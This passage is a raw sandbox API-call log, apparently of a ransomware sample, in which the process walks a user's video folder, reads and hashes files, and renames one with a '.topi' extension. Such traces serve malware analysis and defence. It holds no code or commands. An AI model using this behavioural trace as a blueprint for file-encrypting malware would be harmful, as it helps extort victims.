pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.856] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.856] GetLastError () returned 0x0 [0097.857] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.857] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.857] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.857] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.857] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xcb90) returned 0x9a06a00 [0097.858] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fba40 [0097.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fba88 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.859] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5018 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5000 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.861] GetCurrentThreadId () returned 0x8c4 [0097.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa460 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.862] GetCurrentThreadId () returned 0x8c4 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.865] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\FCmit-LXZwDBRjcC_u d.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\fcmit-lxzwdbrjcc_u d.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\FCmit-LXZwDBRjcC_u d.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\fcmit-lxzwdbrjcc_u d.mp4.topi")) returned 1 [0097.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.866] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.867] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.867] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d236cf0, ftCreationTime.dwHighDateTime=0x1d5b6e3, ftLastAccessTime.dwLowDateTime=0x87155450, ftLastAccessTime.dwHighDateTime=0x1d5bd6b, ftLastWriteTime.dwLowDateTime=0x87155450, ftLastWriteTime.dwHighDateTime=0x1d5bd6b, nFileSizeHigh=0x0, nFileSizeLow=0x73e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jf1OVe.mp4", cAlternateFileName="")) returned 1 [0097.868] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Jf1OVe.mp4") returned=".mp4" [0097.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Jf1OVe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\jf1ove.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.868] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=29664) returned 1 [0097.868] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.871] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x73ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.871] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.873] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.873] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.873] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.873] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.874] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.874] GetLastError () returned 0x0 [0097.874] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.874] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.874] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.874] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.874] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x73e0) returned 0x9a06a00 [0097.874] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fba88 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbad0 [0097.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.875] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5030 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5018 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.876] GetCurrentThreadId () returned 0x8c4 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa4f0 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.876] GetCurrentThreadId () returned 0x8c4 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 